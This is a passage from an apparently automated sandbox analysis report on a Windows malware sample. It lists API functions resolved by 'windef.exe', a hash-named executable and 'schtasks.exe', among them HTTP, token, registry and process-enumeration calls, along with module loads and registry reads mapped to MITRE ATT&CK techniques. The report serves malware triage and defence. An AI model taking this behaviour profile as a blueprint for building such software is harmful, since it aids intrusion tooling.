\"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00006132)\n \"windef.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00006132)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GdiplusShutdown (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GdipCreateBitmapFromHBITMAP (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GdipGetImageEncodersSize (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GdipGetImageEncoders (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GdipDisposeImage (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GdipSaveImageToStream (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateStreamOnHGlobal (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetHGlobalFromStream (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ExpandEnvironmentStringsW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetComputerNameW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatus (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateMutexA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ReleaseMutex (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetCurrentDirectoryW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SetEnvironmentVariableW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SetCurrentDirectoryW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FindNextFileW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CopyFileW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SetDllDirectoryW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter DeleteFileW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateProcessW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateProcessAsUserW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter EnumDisplayDevicesW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter wvsprintfA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetKeyboardLayoutList (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RtlComputeCrc32 (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InternetOpenA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InternetConnectA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter HttpOpenRequestA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter HttpAddRequestHeadersA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter HttpSendRequestA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InternetReadFile (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InternetCloseHandle (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InternetCrackUrlA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InternetSetOptionA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006108)\n \"schtasks.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004040)\n \"schtasks.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004040)\n \"schtasks.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004040)\n \"schtasks.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004040)\n \"schtasks.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004040)\n \"schtasks.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004040)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F00000\n \"vnc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F00000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F00000\n \"windef.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F00000\n \"schtasks.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F00000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"windef.exe\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"vnc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"vnc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"windef.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"windef.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"windef.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenBaseKey\" in 